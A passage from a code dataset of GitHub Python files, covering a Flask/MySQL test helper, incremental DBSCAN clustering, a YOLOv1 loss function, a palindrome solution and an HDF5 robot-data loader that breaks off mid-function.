copy.py","file_ext":"py","file_size_in_byte":13413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39322273251","text":"from flask import Flask\nfrom flaskext.mysql import MySQL\n\nclass MockPostRequest(object):\n def __init__(self, json_data):\n self.json = json_data\n\n\nclass MockGetRequest(object):\n def __init__(self, data):\n self.args = Args(data)\n\n\nclass Args(object):\n def __init__(self, data):\n self.data = data\n \n def getlist(self, key):\n return self.data[key] if key in self.data else None\n\n\ndef setup_test_db(): \n app = Flask(__name__)\n mysql_test = MySQL()\n\n # MySQL configurations\n app.config['MYSQL_DATABASE_USER'] = 'root'\n app.config['MYSQL_DATABASE_PASSWORD'] = '0027'\n app.config['MYSQL_DATABASE_DB'] = 'testschooladmin'\n app.config['MYSQL_DATABASE_HOST'] = 'localhost'\n mysql_test.init_app(app)\n\n # Initialize test database\n try:\n conn = mysql_test.connect()\n cursor = conn.cursor()\n cursor.callproc('init_db')\n conn.commit()\n finally:\n cursor.close()\n conn.close()\n \n return mysql_test\n","repo_name":"szenius/school-admin","sub_path":"test/test_service/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18537038765","text":"import pandas as pd\r\nimport io\r\nfrom sklearn.cluster import DBSCAN\r\n\r\n\r\ndef distance(element_1, element_2):\r\n \"\"\"\r\n Calculates the distance between the element and the mean_core_element using the Euclidean distance\r\n :param element_1: the current element that needs to be checked\r\n :param element_2: the element to check the distance from\r\n :returns distance: the Euclidean distance between the element_1 and the element_2(float)\r\n \"\"\"\r\n euclidean_distance = ((element_1['CPU'] - element_2['CPU']) ** 2 +\r\n (element_1['Memory'] - element_2['Memory']) ** 2 +\r\n (element_1['Disk'] - element_2['Disk']) ** 2) ** (1 / 2)\r\n return euclidean_distance.iloc[0].astype(float)\r\n\r\n\r\nclass IncrementalDBSCAN:\r\n\r\n def __init__(self, eps=5, min_samples=3):\r\n \"\"\"\r\n Constructor the Incremental_DBSCAN class.\r\n :param eps: the maximum radius that an element should be in order to formulate a cluster\r\n :param min_samples: the minimum samples required in order to formulate a cluster\r\n In order to identify the optimum eps and min_samples we need to make a KNN\r\n \"\"\"\r\n self.dataset = pd.DataFrame(columns=['CPU', 'Memory', 'Disk'])\r\n self.labels = pd.DataFrame(columns=['Label'])\r\n self.final_dataset = pd.DataFrame(columns=['CPU', 'Memory', 'Disk', 'Label'])\r\n self.mean_core_elements = pd.DataFrame(columns=['CPU', 'Memory', 'Disk', 'Label'])\r\n self.eps = eps\r\n self.min_samples = min_samples\r\n self.largest_cluster = -1\r\n self.cluster_limits = 0\r\n self.largest_cluster_limits = 0\r\n\r\n def set_data(self, message):\r\n \"\"\"\r\n After the connection with the RabbitMQ is complete a message is received.\r\n This function is used to gather the message from the consumer. It appends the newly arrived data to the\r\n dataset used for clustering.\r\n :param message: The message consumed by the RabbitMQ. Should be a 3-column, comma-separated text.\r\n \"\"\"\r\n # store the collected message to a temp dataframe\r\n temp = pd.read_csv(io.StringIO(message), sep=',', header=None)\r\n temp.columns = ['CPU', 'Memory', 'Disk']\r\n # append the temp to the dataset\r\n self.dataset = self.dataset.append(temp, ignore_index=True)\r\n\r\n def batch_dbscan(self):\r\n \"\"\"\r\n The DBSCAN algorithm taken from the sklearn library. It is used to formulate the clusters the first time.\r\n Based on the outcomes of this algorithm the Incremental_DBSCAN algorithm\r\n \"\"\"\r\n batch_dbscan = DBSCAN(eps=self.eps, min_samples=self.min_samples).fit(self.dataset)\r\n # Get the number of the clusters created\r\n # n_clusters_ = len(set(self.labels)) - (1 if -1 in self.labels else 0)\r\n self.add_labels_to_dataset(batch_dbscan.labels_)\r\n\r\n # Cast everything in the final_dataset as integer.\r\n # If this line is missing, it throws an error\r\n self.final_dataset = self.final_dataset.astype(int)\r\n # self.incremental_dbscan_()\r\n # self.sort_dataset_based_on_labels()\r\n # self.find_mean_core_element()\r\n # response = self.calculate_min_distance_centroid()\r\n # # print(response)\r\n # if response is not None:\r\n # self.check_min_samples_in_eps_or_outlier(min_dist_index=response)\r\n # self.largest_cluster = self.find_largest_cluster()\r\n\r\n def add_labels_to_dataset(self, labels):\r\n \"\"\"\r\n This function adds the labels on the dataset after the batch DBSCAN is done\r\n :param labels: The labels param should be a list that describes the cluster of each element.\r\n If an element is considered as an outlier it should be equal to -1\r\n \"\"\"\r\n self.labels = pd.DataFrame(labels, columns=['Label'])\r\n self.final_dataset = pd.concat([self.dataset, self.labels], axis=1)\r\n\r\n def sort_dataset_based_on_labels(self):\r\n \"\"\"\r\n This function sorts the dataset based on the Label of each cluster.\r\n \"\"\"\r\n # print(self.final_dataset)\r\n self.final_dataset = self.final_dataset.sort_values(by=['Label'])\r\n # Cast everything in the final_dataset as integer.\r\n # If this line is missing, it throws an error\r\n self.final_dataset = self.final_dataset.astype(int)\r\n\r\n def find_mean_core_element(self):\r\n \"\"\"\r\n This function calculates the average core elements of each cluster.\r\n Note: It does not calculate an average core element for the outliers.\r\n \"\"\"\r\n # Exclude rows labeled as outliers\r\n self.mean_core_elements = self.final_dataset.loc[self.final_dataset['Label'] != -1]\r\n # Find the mean core elements of each cluster\r\n self.mean_core_elements = self.mean_core_elements \\\r\n .groupby('Label')['CPU', 'Memory', 'Disk'].mean()\r\n # print(self.mean_core_elements)\r\n # response = self.calculate_min_distance_centroid()\r\n # # print(response)\r\n # if response is not None:\r\n # self.check_min_samples_in_eps_or_outlier(min_dist_index=response)\r\n\r\n def calculate_min_distance_centroid(self):\r\n \"\"\"\r\n This function identifies the closest mean_core_element to the incoming element\r\n that has not yet been added to a cluster or considered as outlier.\r\n The distance is calculated using the distance function as it is described above.\r\n\r\n :returns min_dist_index: if there is a cluster that is closest to the new entry element\r\n or None if there are no clusters yet.\r\n \"\"\"\r\n min_dist = None\r\n min_dist_index = None\r\n\r\n # Check if there are elements in the core_elements dataframe.\r\n # In other words if there are clusters created by the DBSCAN algorithm\r\n if not self.mean_core_elements.empty:\r\n # Iterate over the mean_core_elements dataframe and find the minimum distance\r\n for index, current_mean_core_element in self.mean_core_elements.iterrows():\r\n tmp_dist = distance(element_1=self.final_dataset.tail(n=1),\r\n element_2=current_mean_core_element)\r\n if min_dist is None:\r\n min_dist = tmp_dist\r\n min_dist_index = index\r\n elif tmp_dist < min_dist:\r\n min_dist = tmp_dist\r\n min_dist_index = index\r\n print('Minimum distance is: ', min_dist, ' at cluster ', min_dist_index)\r\n return min_dist_index\r\n else:\r\n return None\r\n\r\n def check_min_samples_in_eps_or_outlier(self, min_dist_index):\r\n \"\"\"\r\n This function checks whether there are at least min_samples in the given radius from the new\r\n entry element.\r\n If there are at least min_samples this element will be added to the cluster and the\r\n mean_core_element of the current cluster has to be re-calculated.\r\n If not, there are two options.\r\n 1. Check if there are at least min_samples outliers in the given radius in order to create a new\r\n cluster, or\r\n 2. Consider it as a new outlier\r\n\r\n :param min_dist_index: This is the parameter that contains information related to the closest\r\n mean_core_element to the current element.\r\n \"\"\"\r\n\r\n # Use only the elements of the closest cluster from the new entry element\r\n new_element = self.final_dataset.tail(1)\r\n nearest_cluster_elements = self.final_dataset[self.final_dataset['Label'] == min_dist_index]\r\n min_samples_count = 0\r\n for index, cluster_element in nearest_cluster_elements.iterrows():\r\n if (cluster_element['CPU'] - self.eps\r\n <= float(new_element['CPU']) <= cluster_element['CPU'] + self.eps) \\\r\n and (cluster_element['Memory'] - self.eps\r\n <= float(new_element['Memory']) <= cluster_element['Memory'] + self.eps) \\\r\n and (cluster_element['Disk'] - self.eps\r\n <= float(new_element['Disk']) <= cluster_element['Disk'] + self.eps):\r\n min_samples_count += 1\r\n\r\n if min_samples_count >= self.min_samples:\r\n # The new element has enough cluster labels in the eps range\r\n # and is now considered as a new member of the cluster.\r\n # The mean core element of this cluster is re-calculated.\r\n self.final_dataset.loc[self.final_dataset.index[-1], 'Label'] = min_dist_index\r\n self.find_mean_core_element()\r\n else:\r\n # The new element is not added to its closest cluster. Now we have to check\r\n # whether it is going to be considered an outlier or it will form a new cluster\r\n # with other outliers.\r\n outliers = self.final_dataset[self.final_dataset['Label'] == -1]\r\n min_outliers_count = 0\r\n new_cluster_elements = pd.DataFrame(columns=['Index'])\r\n for index, outlier in outliers.iterrows():\r\n if (outlier['CPU'] - self.eps\r\n <= float(new_element['CPU']) <= outlier['CPU'] + self.eps) \\\r\n and (outlier['Memory'] - self.eps\r\n <= float(new_element['Memory']) <= outlier['Memory'] + self.eps) \\\r\n and (outlier['Disk'] - self.eps\r\n <= float(new_element['Disk']) <= outlier['Disk'] + self.eps):\r\n min_outliers_count += 1\r\n new_cluster_elements = new_cluster_elements.append({\"Index\": index}, ignore_index=True)\r\n\r\n if min_outliers_count >= self.min_samples:\r\n # The new element has enough outliers in its eps radius in order to form a new cluster.\r\n new_cluster_number = int(self.final_dataset['Label'].max()) + 1\r\n for new_cluster_element in new_cluster_elements.iterrows():\r\n self.final_dataset.loc[\r\n self.final_dataset.index[int(new_cluster_element[1])], 'Label'] = new_cluster_number\r\n\r\n print(\"A new cluster is now formed out of already existing outliers.\")\r\n\r\n # The new cluster's mean core element is calculated after the cluster's creation.\r\n self.find_mean_core_element()\r\n\r\n else:\r\n # The new element is an outlier.\r\n # It is not close enough to its closest in order to be added to it,\r\n # neither has enough outliers close by to form a new cluster.\r\n self.final_dataset.loc[self.final_dataset.index[-1], 'Label'] = -1\r\n\r\n print(\"The new element in the dataset: \\n\", self.final_dataset.tail(1))\r\n\r\n def incremental_dbscan_(self):\r\n self.final_dataset = self.final_dataset.append({'CPU': self.dataset.iloc[-1]['CPU'],\r\n 'Memory': self.dataset.iloc[-1]['Memory'],\r\n 'Disk': self.dataset.iloc[-1]['Disk'],\r\n 'Label': -1}, ignore_index=True)\r\n self.find_mean_core_element()\r\n min_distance_mean_core_element_index = self.calculate_min_distance_centroid()\r\n if min_distance_mean_core_element_index is not None:\r\n self.check_min_samples_in_eps_or_outlier(min_dist_index=min_distance_mean_core_element_index)\r\n self.largest_cluster = self.find_largest_cluster()\r\n self.find_cluster_limits()\r\n self.get_largest_cluster_limits()\r\n\r\n def find_largest_cluster(self):\r\n \"\"\"\r\n This function identifies the largest of the clusters with respect to the number of the core elements.\r\n The largest cluster is the one with the most core elements in it.\r\n\r\n :returns: the number of the largest cluster. If -1 is returned, then there are no clusters created\r\n in the first place.\r\n \"\"\"\r\n cluster_size = self.final_dataset.groupby('Label')['Label'].count()\r\n # cluster_size = cluster_size['CPU'].value_counts()\r\n try:\r\n cluster_size = cluster_size.drop(labels=[-1])\r\n except ValueError:\r\n print(\"The label -1 does not exist\")\r\n largest_cluster = -1\r\n if not cluster_size.empty:\r\n largest_cluster = cluster_size.idxmax()\r\n print('The cluster with the most elements is cluster No: ', cluster_size.idxmax())\r\n return largest_cluster\r\n else:\r\n print('There aren\\'t any clusters formed yet')\r\n return largest_cluster\r\n\r\n def find_cluster_limits(self):\r\n self.cluster_limits = self.final_dataset\\\r\n .groupby(self.final_dataset['Label'])\\\r\n .agg(['min', 'max'])\r\n print(self.cluster_limits)\r\n self.cluster_limits.to_json(r'../json_exports/all_cluster_limits.json')\r\n\r\n def get_largest_cluster_limits(self):\r\n self.largest_cluster_limits = self.cluster_limits.iloc[self.largest_cluster+1]\r\n self.largest_cluster_limits.to_json(r'../json_exports/largest_cluster_limits.json')\r\n print(self.largest_cluster_limits)\r\n","repo_name":"csymvoul/Incremental_DBSCAN","sub_path":"incremental_dbscan/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13288,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} +{"seq_id":"73764174565","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nclass yoloLoss(nn.Module):\r\n def __init__(self, S, B, l_coord, l_noobj):\r\n super(yoloLoss,self).__init__()\r\n self.S = S\r\n self.B = B\r\n self.l_coord = l_coord\r\n self.l_noobj = l_noobj\r\n\r\n def compute_iou(self, box1, box2):\r\n '''Compute the intersection over union of two set of boxes, each box is [x1,y1,x2,y2].\r\n Args:\r\n box1: (tensor) bounding boxes, sized [N,4].\r\n box2: (tensor) bounding boxes, sized [M,4].\r\n Return:\r\n (tensor) iou, sized [N,M].\r\n '''\r\n N = box1.size(0)\r\n M = box2.size(0)\r\n\r\n lt = torch.max(\r\n box1[:,:2].unsqueeze(1).expand(N,M,2), # [N,2] -> [N,1,2] -> [N,M,2]\r\n box2[:,:2].unsqueeze(0).expand(N,M,2), # [M,2] -> [1,M,2] -> [N,M,2]\r\n )\r\n\r\n rb = torch.min(\r\n box1[:,2:].unsqueeze(1).expand(N,M,2), # [N,2] -> [N,1,2] -> [N,M,2]\r\n box2[:,2:].unsqueeze(0).expand(N,M,2), # [M,2] -> [1,M,2] -> [N,M,2]\r\n )\r\n\r\n wh = rb - lt # [N,M,2]\r\n wh[wh<0] = 0 # clip at 0\r\n inter = wh[:,:,0] * wh[:,:,1] # [N,M]\r\n\r\n area1 = (box1[:,2]-box1[:,0]) * (box1[:,3]-box1[:,1]) # [N,]\r\n area2 = (box2[:,2]-box2[:,0]) * (box2[:,3]-box2[:,1]) # [M,]\r\n area1 = area1.unsqueeze(1).expand_as(inter) # [N,] -> [N,1] -> [N,M]\r\n area2 = area2.unsqueeze(0).expand_as(inter) # [M,] -> [1,M] -> [N,M]\r\n\r\n iou = inter / (area1 + area2 - inter)\r\n return iou\r\n\r\n def forward(self,pred_tensor, target_tensor):\r\n '''\r\n pred_tensor: (tensor) size(batchsize,S,S,Bx5+20=30) [x,y,w,h,c]\r\n target_tensor: (tensor) size(batchsize,S,S,30)\r\n '''\r\n device = pred_tensor.device\r\n N = pred_tensor.size()[0]\r\n coo_mask = target_tensor[:, :, :, 4] > 0 # 包含 object 的 mask\r\n noo_mask = target_tensor[:, :, :, 4] == 0 # 包含 object 的 mask\r\n coo_mask = coo_mask.unsqueeze(-1).expand_as(target_tensor)\r\n noo_mask = noo_mask.unsqueeze(-1).expand_as(target_tensor)\r\n\r\n coo_pred = pred_tensor[coo_mask].view(-1, 30)\r\n box_pred = coo_pred[:, :10].contiguous().view(-1, 5) # box1[x1,y1,w1,h1,c1]、box2[x2,y2,w2,h2,c2]\r\n class_pred = coo_pred[:, 10:] # class probability\r\n \r\n coo_target = target_tensor[coo_mask].view(-1, 30)\r\n box_target = coo_target[:, :10].contiguous().view(-1, 5)\r\n class_target = coo_target[:, 10:]\r\n\r\n # compute not contain obj loss\r\n noo_pred = pred_tensor[noo_mask].view(-1, 30)\r\n noo_target = target_tensor[noo_mask].view(-1, 30)\r\n\r\n noo_pred_mask = torch.ByteTensor(noo_pred.size())\r\n noo_pred_mask.zero_()\r\n noo_pred_mask[:, 4] = 1\r\n noo_pred_mask[:, 9] = 1\r\n noo_pred_c = noo_pred[noo_pred_mask] #noo pred只需要计算 c 的损失 size[-1,2]\r\n noo_target_c = noo_target[noo_pred_mask]\r\n noobj_loss = F.mse_loss(noo_pred_c,noo_target_c, reduction=\"sum\")\r\n\r\n #compute contain obj loss\r\n coo_response_mask = torch.ByteTensor(box_target.size())\r\n coo_response_mask.zero_()\r\n coo_not_response_mask = torch.ByteTensor(box_target.size())\r\n coo_not_response_mask.zero_()\r\n box_target_iou = torch.zeros(box_target.size()).to(device)\r\n for i in range(0, box_target.size()[0], 2): #choose the best iou box\r\n # 取出一个 grid cell 的两个 predict bbox\r\n box1 = box_pred[i:i+2]\r\n # 转换到原图像的尺度范围下 的相对位置\r\n box1_xyxy = torch.FloatTensor(box1.size())\r\n box1_xyxy[:, :2] = box1[:, :2] / 14. - 0.5 * box1[:, 2:4]\r\n box1_xyxy[:, 2:4] = box1[:, :2] / 14. + 0.5 * box1[:, 2:4]\r\n\r\n # 取出 target 的 bbox 的坐标\r\n box2 = box_target[i].view(-1,5)\r\n # 转换到原图像的尺度范围下 的相对位置\r\n box2_xyxy = torch.FloatTensor(box2.size())\r\n box2_xyxy[:, :2] = box2[:, :2]/14. - 0.5*box2[:, 2:4]\r\n box2_xyxy[:, 2:4] = box2[:, :2]/14. + 0.5*box2[:, 2:4]\r\n\r\n # 分别计算两个 predict bbox 与 target bbox 的 IoU\r\n iou = self.compute_iou(box1_xyxy[:,:4],box2_xyxy[:, :4]) #[2,1]\r\n max_iou, max_index = iou.max(0)\r\n max_index = max_index.data.to(device)\r\n \r\n coo_response_mask[i+max_index] = 1\r\n coo_not_response_mask[i+1-max_index] = 1\r\n\r\n box_target_iou[i+max_index,torch.LongTensor([4]).to(device)] = (max_iou).data.to(device)\r\n box_target_iou = box_target_iou.to(device)\r\n\r\n #1.response loss\r\n box_pred_response = box_pred[coo_response_mask].view(-1, 5)\r\n box_target_response_iou = box_target_iou[coo_response_mask].view(-1, 5)\r\n box_target_response = box_target[coo_response_mask].view(-1, 5)\r\n contain_loss = F.mse_loss(box_pred_response[:, 4], box_target_response_iou[:,4], reduction=\"sum\")\r\n loc_loss = F.mse_loss(box_pred_response[:, :2],box_target_response[:, :2], reduction=\"sum\") \\\r\n + F.mse_loss(torch.sqrt(box_pred_response[:, 2:4]),torch.sqrt(box_target_response[:, 2:4]), reduction=\"sum\")\r\n\r\n #2.not response loss\r\n box_pred_not_response = box_pred[coo_not_response_mask].view(-1, 5)\r\n box_target_not_response = box_target[coo_not_response_mask].view(-1, 5)\r\n box_target_not_response[:, 4] = 0\r\n not_contain_loss = F.mse_loss(box_pred_not_response[:, 4], box_target_not_response[:, 4], reduction=\"sum\")\r\n\r\n # 3.class loss\r\n class_loss = F.mse_loss(class_pred, class_target, reduction=\"sum\")\r\n\r\n # return (self.l_coord*loc_loss + 2 * contain_loss + not_contain_loss + self.l_noobj*noobj_loss + class_loss)/N\r\n\r\n return (self.l_coord * loc_loss + contain_loss + self.l_noobj * (noobj_loss + not_contain_loss) + class_loss) / N\r\n\r\n","repo_name":"Enzo-MiMan/cv_related_collections","sub_path":"object_detection/yolo_v1/yoloLoss.py","file_name":"yoloLoss.py","file_ext":"py","file_size_in_byte":6000,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"52"} +{"seq_id":"35237954792","text":"class Solution:\n def longestPalindrome(self, s: str) -> str:\n size = len(s)\n if size <= 1:\n return s\n longest_l = 1\n curlen = 0\n res = s[0]\n dp = [[False for _ in range(size)] for _ in range(size)] # 存储用的表\n for r in range(1, size):\n for l in range(r): # 暴力法也得有这个循环,完全一样。但是暴力法后面判\n # 断一个字符串是不是回文需要n的时间复杂度,动态规划不需要\n if s[l] == s[r] and (r - l <= 2 or dp[l+1][r-1]): # 状态转移方程以及边界\n dp[l][r] = True\n curlen = r - l + 1 # 求得此时长度\n if curlen > longest_l: # 求得最大长度并用一个字符串记录\n longest_l = curlen\n res = s[l:r+1]\n return res\n\n\nsolution = Solution()\nm = solution.longestPalindrome('fdfgabcbad')\nprint(m)\n\n\n\n","repo_name":"Mrhairui/leetcode","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29617369437","text":"from app import app\nfrom app.web import web\n\n\n__author__ = \"yangxin\"\n\n# 将 蓝图对象 注册到 flask app 实例中\napp.register_blueprint(web)\n\n# 如果该文件是 python 的入口文件,则下面的代码会被执行,如果改文件被导入到其他模块了,则下面的代码不会被执行\nif __name__ == \"__main__\":\n # 其实,在生产环境中,我们是使用 nginx + uwsgi 来启动项目的,下面的代码根本不会被执行\n # 因为,我们的项目是作为一个模块导入到 uwsgi 服务器里面\n app.run(\n host=app.config[\"HOST\"],\n port=app.config[\"PORT\"],\n debug=app.config[\"DEBUG\"],\n threaded=True,\n )\n","repo_name":"yancey92/fisher","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11505927530","text":"\"\"\"\n Given a sorted array A of unique numbers, find the K-th missing number starting from the leftmost number of the array.\n\n \n\n Example 1:\n\n Input: A = [4,7,9,10], K = 1\n Output: 5\n Explanation:\n The first missing number is 5.\n Example 2:\n\n Input: A = [4,7,9,10], K = 3\n Output: 8\n Explanation:\n The missing numbers are [5,6,8,...], hence the third missing number is 8.\n Example 3:\n\n Input: A = [1,2,4], K = 3\n Output: 6\n Explanation:\n The missing numbers are [3,5,6,7,...], hence the third missing number is 6.\n \n\n Note:\n\n 1 <= A.length <= 50000\n 1 <= A[i] <= 1e7\n 1 <= K <= 1e8\n Accepted\n 7,862\n Submissions\n 14,570\n\"\"\"\nclass Solution:\n def missingElement(self, nums: List[int], k: int) -> int:\n if nums[-1] -nums[0]-1-len(nums)+2 12 and write1 > 12: \n widx += 1\n\nprint(f\"0 Rx {np.mean(rx0)} {np.std(rx0)}, Tx {np.mean(tx0)} {np.std(tx0)}\")\nprint(f\"1 Rx {np.mean(rx1)} {np.std(rx1)}, Tx {np.mean(tx1)} {np.std(tx1)}\")\n","repo_name":"cablelabs/mass","sub_path":"scripts/addappcontext.py","file_name":"addappcontext.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75329666404","text":"import h5py\nimport cv2\nimport imageio\nimport io\nimport hashlib\nimport numpy as np\nimport os\nimport random\nimport pickle as pkl\n\n\nclass ACTION_MISMATCH:\n ERROR = 0\n PAD_ZERO = 1\n CLEAVE = 2\n\n\nclass STATE_MISMATCH:\n ERROR = 0\n PAD_ZERO = 1\n CLEAVE = 2\n\n\nclass HDF5Loader:\n def __init__(self, f_name, file_metadata, hparams, check_hash=True):\n self._file_metadata = file_metadata\n self._hparams = hparams\n\n assert os.path.exists(f_name) and os.path.isfile(f_name), \"invalid f_name\"\n with open(f_name, 'rb') as f:\n buf = f.read()\n if check_hash:\n assert hashlib.sha256(buf).hexdigest() == file_metadata['sha256'], \"file hash doesn't match meta-data. maybe delete meta-data and re-generate?\"\n # self._hf = h5py.File(io.BytesIO(buf), 'r')\n self._hf = h5py.File(f_name, 'r')\n \n\n # start_time, n_states = 0, min([file_metadata['state_T'], file_metadata['img_T'], file_metadata['action_T'] + 1])\n # assert n_states > 1, \"must be more than one state in loaded tensor!\"\n # if 1 < hparams['load_T'] < n_states:\n # start_time = rng.randint(0, n_states - hparams['load_T'])\n # n_states = hparams['load_T']\n\n # images = [load_camera_imgs(c, start_time, n_states)[None] for c in hparams['cams_to_load']]\n # images = np.swapaxes(np.concatenate(images, 0), 0, 1)\n # images = np.transpose(images, (0, 1, 4, 2, 3))\n # actions = load_actions(hf, file_metadata, hparams).astype(np.float32)[start_time:start_time + n_states-1]\n # full_state = load_states(hf, file_metadata, hparams).astype(np.float32)\n # states = full_state[start_time:start_time + n_states]\n\n def load_video(self, cam_index, target_dims=None, start_time=0, n_load=None):\n if target_dims is None:\n target_dims = self._hparams['img_size']\n cam_group = self._hf['env']['cam{}_video'.format(cam_index)]\n old_dims = self._file_metadata['frame_dim']\n length = self._file_metadata['img_T']\n encoding = self._file_metadata['img_encoding']\n image_format = self._file_metadata['image_format']\n\n if n_load is None and start_time == 0:\n n_load = length\n elif n_load is None:\n raise ValueError(\"Must supply both start_time and n_load or neither!\")\n\n old_height, old_width = old_dims\n target_height, target_width = target_dims\n resize_method = cv2.INTER_CUBIC\n if target_height * target_width < old_height * old_width:\n resize_method = cv2.INTER_AREA\n \n images = np.zeros((n_load, target_height, target_width, 3), dtype=np.uint8)\n if encoding == 'mp4':\n buf = io.BytesIO(cam_group['frames'][:].tostring())\n img_buffer = [img for t, img in enumerate(imageio.get_reader(buf, format='mp4')) if start_time <= t < n_load + start_time]\n try:\n imageio._proc.kill()\n except:\n pass\n elif encoding == 'jpg':\n img_buffer = [cv2.imdecode(cam_group['frame{}'.format(t)][:], cv2.IMREAD_COLOR)\n for t in range(start_time, start_time + n_load)]\n else: \n raise ValueError(\"encoding not supported\")\n \n for t, img in enumerate(img_buffer):\n if (old_height, old_width) == (target_height, target_width):\n images[t] = img\n else:\n images[t] = cv2.resize(img, (target_width, target_height), interpolation=resize_method)\n if image_format == 'RGB':\n return images\n elif image_format == 'BGR':\n return images[:, :, :, ::-1]\n raise NotImplementedError\n\n def load_image(self, target_dims=None, start_time=0, n_load=None):\n if target_dims is None:\n target_dims = self._hparams['img_size']\n image = self._hf['env']['image']\n old_dims = self._hf['env']['image'].attrs['shape'][:2]\n old_height, old_width = old_dims\n target_height, target_width = target_dims\n resize_method = cv2.INTER_CUBIC\n if target_height * target_width < old_height * old_width:\n resize_method = cv2.INTER_AREA\n image = cv2.imdecode(image[:], cv2.IMREAD_COLOR)\n return cv2.resize(image, (target_width, target_height), interpolation=resize_method)[:, :, ::-1]\n\n def _add_finger_sensor(self, ret_state):\n if self._hparams['load_finger_sensors']:\n finger_sensors = self._hf['env']['finger_sensors'][:]\n return np.concatenate((ret_state, finger_sensors), -1)\n return ret_state\n\n def load_states(self):\n if len(self._hf['env']['state'].shape) == 1: # single time-step mode\n return self._hf['env']['state'][:]\n\n s_T, sdim = self._file_metadata ['state_T'], self._file_metadata ['sdim']\n if self._hparams['target_sdim'] == sdim:\n return self._add_finger_sensor(self._hf['env']['state'][:])\n\n elif sdim < self._hparams['target_sdim'] and self._hparams['state_mismatch'] & STATE_MISMATCH.PAD_ZERO:\n pad = np.zeros((s_T, self._hparams['target_sdim'] - sdim), dtype=np.float32)\n return self._add_finger_sensor(np.concatenate((self._hf['env']['state'][:], pad), axis=-1))\n\n elif sdim > self._hparams['target_sdim'] and self._hparams['state_mismatch'] & STATE_MISMATCH.CLEAVE:\n return self._add_finger_sensor(self._hf['env']['state'][:][:, :self._hparams['target_sdim']])\n\n else:\n raise ValueError(\"file sdim - {}, target sdim - {}, pad behavior - {}\".format(sdim, self._hparams['target_sdim'], self._hparams['state_mismatch']))\n\n def load_actions(self):\n if len(self._hf['policy']['actions'].shape) == 1: # single time-step mode\n return self._hf['policy']['actions'][:]\n\n a_T, adim = self._file_metadata['action_T'], self._file_metadata['adim']\n if self._hparams['target_adim'] == adim:\n return self._hf['policy']['actions'][:]\n\n elif self._hparams['target_adim'] == adim + 1 and self._hparams['impute_autograsp_action'] and self._file_metadata ['primitives'] == 'autograsp':\n action_append, old_actions = np.zeros((a_T, 1)), self._hf['policy']['actions'][:]\n next_state = self._hf['env']['state'][:][1:, -1]\n \n high_val, low_val = self._file_metadata['high_bound'][-1], self._file_metadata['low_bound'][-1]\n midpoint = (high_val + low_val) / 2.0\n\n for t, s in enumerate(next_state):\n if s > midpoint:\n action_append[t, 0] = high_val\n else:\n action_append[t, 0] = low_val\n return np.concatenate((old_actions, action_append), axis=-1)\n\n elif adim < self._hparams['target_adim'] and self._hparams['action_mismatch'] & ACTION_MISMATCH.PAD_ZERO:\n pad = np.zeros((a_T, self._hparams['target_adim'] - adim), dtype=np.float32)\n return np.concatenate((self._hf['policy']['actions'][:], pad), axis=-1)\n\n elif adim > self._hparams['target_adim'] and self._hparams['action_mismatch'] & ACTION_MISMATCH.CLEAVE:\n return self._hf['policy']['actions'][:][:, :self._hparams['target_adim']]\n\n else:\n raise ValueError(\"file adim - {}, target adim - {}, pad behavior - {}\".format(adim, self._hparams['target_adim'], self._hparams['action_mismatch']))\n\n def load_robot_id(self, robotname_list):\n robotname2id = {n: i for i, n in enumerate(robotname_list)}\n return robotname2id[self._file_metadata['robot']]\n\n def close(self):\n self._hf.close()\n self._hf = None\n \n @staticmethod\n def default_hparams():\n return {\n 'target_adim': 4,\n 'target_sdim': 5,\n 'state_mismatch': STATE_MISMATCH.ERROR, # TODO make better flag parsing\n 'action_mismatch': ACTION_MISMATCH.ERROR, # TODO make better flag parsing\n 'img_size': [48, 64],\n 'impute_autograsp_action': True,\n 'load_finger_sensors': False,\n }\n\n @property\n def hf(self):\n return self._hf\n\n# def load_data(f_name, file_metadata, hparams, rng=None):\n# rng = random.Random(rng)\n# assert os.path.exists(f_name) and os.path.isfile(f_name), \"invalid f_name\"\n\n# with open(f_name, 'rb') as f:\n# buf = f.read()\n# assert hashlib.sha256(buf).hexdigest() == file_metadata['sha256'], \"file hash doesn't match meta-data. maybe delete pkl and re-generate?\"\n\n# with h5py.File(io.BytesIO(buf), 'r') as hf:\n# start_time, n_states = 0, min([file_metadata['state_T'], file_metadata['img_T'], file_metadata['action_T'] + 1])\n# assert n_states > 1, \"must be more than one state in loaded tensor!\"\n# if 1 < hparams['load_T'] < n_states:\n# start_time = rng.randint(0, n_states - hparams['load_T'])\n# n_states = hparams['load_T']\n\n# assert all([0 <= i < file_metadata['ncam'] for i in hparams['cams_to_load']]), \"cams_to_load out of bounds!\"\n# images = [load_camera_imgs(c, hf, file_metadata, hparams['img_size'], start_time, n_states)[None] for c in hparams['cams_to_load']]\n# images = np.swapaxes(np.concatenate(images, 0), 0, 1)\n# images = np.transpose(images, (0, 1, 4, 2, 3))\n# actions = load_actions(hf, file_metadata, hparams).astype(np.float32)[start_time:start_time + n_states-1]\n# full_state = load_states(hf, file_metadata, hparams).astype(np.float32)\n# states = full_state[start_time:start_time + n_states]\n\n# if hparams['load_finger_sensors']:\n# finger_sensors = hf['env']['finger_sensors'][:][start_time:start_time + n_states].astype(np.float32).reshape((-1, 1))\n# states = np.concatenate((states, finger_sensors), -1)\n\n# if hparams['load_reward']:\n# assert 1 >= hparams['reward_discount'] >= 0, 'invalid reward discount'\n# finger_sensors = hf['env']['finger_sensors'][:].reshape((-1, 1))\n# good_states = np.logical_and(full_state[1:, 2] >= 0.9, full_state[1:, -1] > 0)\n# good_states = 